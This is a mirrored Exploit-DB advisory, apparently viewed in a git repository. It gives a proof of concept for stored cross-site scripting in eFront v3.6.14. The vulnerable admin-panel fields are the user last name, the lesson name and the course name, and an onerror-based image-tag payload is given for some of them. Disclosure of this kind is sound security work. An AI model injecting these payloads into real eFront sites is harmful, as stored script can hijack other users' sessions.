bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/30213.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

44 lines
No EOL
1.3 KiB
Text
Raw Blame History

###########################################################
Exploit-DB Note: Screenshot provided by exploit author.
###########################################################
[~] Exploit Title: eFront v3.6.14 (build 18012) -Stored XSS in multiple
Parameters
[~] Author: sajith
[~] version: eFront v3.6.14- build 18012
[~]Vendor Homepage: http://www.efrontlearning.net/
[~] vulnerable app link:http://www.efrontlearning.net/download
###########################################################
POC by sajith shetty:
[###]Log in with admin account and create new user
http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php?ctg=personal&user=root&op=profile&add_user=1
(Home <20> Users <20> Administrator S. (root) <20> New user)
Here "Last name" field is vulnerable to stored XSS [payload:"><img src=x
onerror=prompt(1);> ]
[###]create new lesson option (
http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php
?
ctg=lessons&add_lesson=1) where "Lession name" is vulnerable to stored xss
[payload:"><img src=x onerror=prompt(1);> ]
[###]create new courses option(
http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php
?
ctg=courses&add_course=1) where "Course name:" filed is vulnerable to
stored XSS
Reference in a new issue View git blame Copy permalink